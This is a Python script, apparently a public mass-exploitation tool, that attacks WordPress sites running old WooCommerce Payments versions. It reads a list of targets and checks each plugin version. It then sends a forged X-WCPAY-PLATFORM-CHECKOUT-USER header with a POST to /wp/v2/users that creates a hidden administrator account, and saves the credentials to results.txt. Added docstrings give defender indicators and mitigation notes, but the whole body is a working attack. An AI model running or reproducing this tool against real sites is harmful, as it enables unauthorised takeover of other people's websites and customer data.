# Made By L == Hanzou
import re
import sys
import urllib3
import requests
from colorama import Fore, Style
import threading
import random
import string
# Silences urllib3's InsecureRequestWarning. Every HTTP call in this file passes
# verify=False, so TLS certificates are never validated and the warning that
# would normally flag that is hidden from the operator.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generate_random_password(length):
    """Return a random ASCII alphanumeric string of ``length`` characters.

    Candidates are redrawn until one holds at least one digit, one uppercase
    and one lowercase letter, so the function never returns for ``length``
    below 3. Values come from ``random``, not a CSPRNG.

    Defender note: the value differs on every call, so a password created by
    this script cannot be matched against a fixed string.
    """
    alphabet = string.ascii_letters + string.digits
    while True:
        candidate = ''.join(random.choice(alphabet) for _ in range(length))
        has_digit = any(ch.isdigit() for ch in candidate)
        has_upper = any(ch.isupper() for ch in candidate)
        has_lower = any(ch.islower() for ch in candidate)
        if has_digit and has_upper and has_lower:
            return candidate
def generate_random_email():
    """Return a random address shaped ``<8 letters>@<8 letters>.<com|net|org>``.

    Both the local part and the domain label are random lowercase ASCII, so
    the domain is not expected to exist.

    Defender note: an administrator account whose e-mail has this shape (two
    random 8-letter lowercase labels) is worth reviewing, but the shape alone
    is a weak indicator.
    """
    def _lowercase_run(count):
        # Same draw order as building each part inline.
        return ''.join(random.choice(string.ascii_lowercase) for _ in range(count))

    local_part = _lowercase_run(8)
    host_label = _lowercase_run(8)
    tld = random.choice(['com', 'net', 'org'])
    return f"{local_part}@{host_label}.{tld}"
def exploit_website(website):
    """Probe one WordPress site and attempt an unauthenticated admin-user creation.

    What the code does, in order:
      1. Prefixes ``https://`` when the entry has no scheme.
      2. Fetches the WooCommerce Payments ``readme.txt`` and reads its
         "Stable tag" line.
      3. If the dotted version, with dots removed and parsed as an int, is
         below 562, it sends a GET and then a POST to the site root. Both carry
         the ``X-WCPAY-PLATFORM-CHECKOUT-USER: 1`` header; the POST body routes
         to ``/wp/v2/users`` and asks for the ``administrator`` role.
      4. On HTTP 201 it appends the site and the generated credentials to
         ``results.txt`` in clear text and prints them.

    Defender notes (derived only from the requests visible here):
      * Indicators: external requests for
        ``/wp-content/plugins/woocommerce-payments/readme.txt``; any inbound
        request carrying ``X-WCPAY-PLATFORM-CHECKOUT-USER``; POSTs to the site
        root with ``rest_route=/wp/v2/users``; the fixed User-Agent string
        below; administrator accounts nobody on the team created.
      * Request headers are often absent from default access logs, so the
        header may only be visible at a WAF or reverse proxy. Confirm this
        for your stack.
      * Mitigation: run a plugin release at or above the one this script
        treats as fixed (5.6.2 by its ``< 562`` threshold; confirm against the
        vendor advisory), then audit and remove unknown admin users and rotate
        credentials.
      * The version test is a digit-concatenation of a self-reported readme
        string, so a "not vulnerable" line from this tool is not evidence of
        patch status.

    NOTE(review): the page lost its indentation. The nesting below is
    reconstructed from the if/else and try/except pairing; keeping the
    status-code check inside the ``with`` block is inferred.
    """
    if not website.startswith(("http://", "https://")):
        website = "https://" + website
    print(Fore.YELLOW + f'Exploiting {website}')
    try:
        # Certificate validation is off (verify=False) on every request here.
        r = requests.get(f"{website}/wp-content/plugins/woocommerce-payments/readme.txt", verify=False, timeout=10)
        # re.search() returns None when the line is missing; .group() then
        # raises AttributeError, which the bare except below reports as
        # "Error occurred" rather than reaching the "Version not found" branch.
        version = re.search(r"Stable tag: (.*)", r.text).group(1)
        if version:
            if int(version.replace('.', '')) < 562:
                print(Style.RESET_ALL + "Site version:", Fore.GREEN + f"{version} - vulnerable!")
                headers = {
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Vivaldi/6.1.3035.111.',
                    # Header the request relies on; see the docstring for
                    # where to look for it in logs.
                    'X-WCPAY-PLATFORM-CHECKOUT-USER': '1'
                }
                generated_username = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
                generated_password = generate_random_password(16)
                generated_email = generate_random_email()
                data = {
                    'rest_route': '/wp/v2/users',
                    'username': generated_username,
                    'email': generated_email,
                    'password': generated_password,
                    'roles': 'administrator'
                }
                with requests.Session() as session:
                    session.get(website, headers=headers, verify=False, timeout=10)
                    response = session.post(website, data=data, headers=headers, verify=False, timeout=10)
                    # 201 Created is taken as proof that the user was added.
                    if response.status_code == 201:
                        # Credentials are stored unencrypted and appended
                        # from several threads without a lock.
                        with open("results.txt", "a") as file:
                            file.write(f"Site: {website}\n")
                            file.write(f"Login: {website}/wp-login.php\n")
                            file.write(f"Username: {generated_username}\n")
                            file.write(f"Email: {generated_email}\n")
                            file.write(f"Password: {generated_password}\n")
                            file.write(f"Login and change your email in {website}/wp-admin/profile.php\n\n")
                        print(Style.RESET_ALL + Fore.GREEN + "Vuln")
                        print(f"Site: {website}")
                        print(f"Login: {website}/wp-login.php")
                        print(f'Username: {generated_username}')
                        print(f'Email: {generated_email}')
                        print(f'Password: {generated_password}')
                    else:
                        print(Style.RESET_ALL + Fore.RED + "Not Vuln")
                        print(Fore.RED + "Failed to add admin.")
            else:
                print(Style.RESET_ALL + "Site version:", Fore.RED + f"{version} - not vulnerable!")
                print(Style.RESET_ALL + Fore.RED + "Not Vuln")
        else:
            print(Style.RESET_ALL + Fore.RED + "Version not found")
            print(Style.RESET_ALL + Fore.RED + "Not Vuln")
    except (requests.Timeout, requests.ConnectionError):
        # Connection failures are also reported as a timeout.
        print(Fore.RED + "Timeout occurred")
        print(Style.RESET_ALL + Fore.RED + "Not Vuln")
    except:
        # Bare except: parse errors, non-numeric versions and file errors all
        # collapse into the same "Not Vuln" output.
        print(Fore.RED + "Error occurred")
        print(Style.RESET_ALL + Fore.RED + "Not Vuln")
    finally:
        print()
def main():
    """Read a list of sites from a file and run ``exploit_website`` on each.

    Prompts for a file name (one site per line) and a thread count, exits with
    status 1 on a missing file, an empty list or a non-positive/non-integer
    count, then starts one thread per listed site.

    Defender note: all targets are contacted at roughly the same time from one
    host with an identical request sequence, which shows up as the same
    readme.txt fetch followed by a GET and a POST to the site root across
    many unrelated sites.

    NOTE(review): the page lost its indentation. Whether the final join loop
    sits after the try/except or inside the ``except KeyboardInterrupt``
    branch cannot be determined from the text; it is placed after it here.
    """
    print()
    print(Fore.RED + "\t[ L == IM-Hanzou ]")
    print(Fore.BLUE + """ _ __ _____
| | /| / /__ ___ / ___/__ __ _ __ _ ___ ___________
| |/ |/ / _ \/ _ \/ /__/ _ \/ ' \/ ' \/ -_) __/ __/ -_)
|__/|__/\___/\___/\___/\___/_/_/_/_/_/_/\__/_/ \__/\__/
""")
    print(Fore.YELLOW + "[ WooCommerce Payments - Unauthorized Add Admin User ]")
    print(Style.RESET_ALL)
    try:
        weblist = input('Weblist filename: ')
        with open(weblist, 'r') as file:
            websites = file.read().splitlines()
    except FileNotFoundError:
        print(Fore.RED + 'File not found!')
        sys.exit(1)
    if not websites:
        print(Fore.RED + 'Error: The website list is empty')
        sys.exit(1)
    try:
        # The value is validated here but not referenced again in this function.
        num_threads = int(input('Threads (number): '))
        if num_threads <= 0:
            raise ValueError
    except ValueError:
        print(Fore.RED + "Threads must be a positive integer.")
        sys.exit(1)
    threads = []
    try:
        for website in websites:
            thread = threading.Thread(target=exploit_website, args=(website,))
            thread.start()
            threads.append(thread)
    except KeyboardInterrupt:
        # Only a message is printed; threads already started keep running.
        print(Fore.YELLOW + "Force stopping the script...")
    for thread in threads:
        thread.join()
# Run the interactive prompt only when executed as a script, not on import.
if __name__ == "__main__":
    main()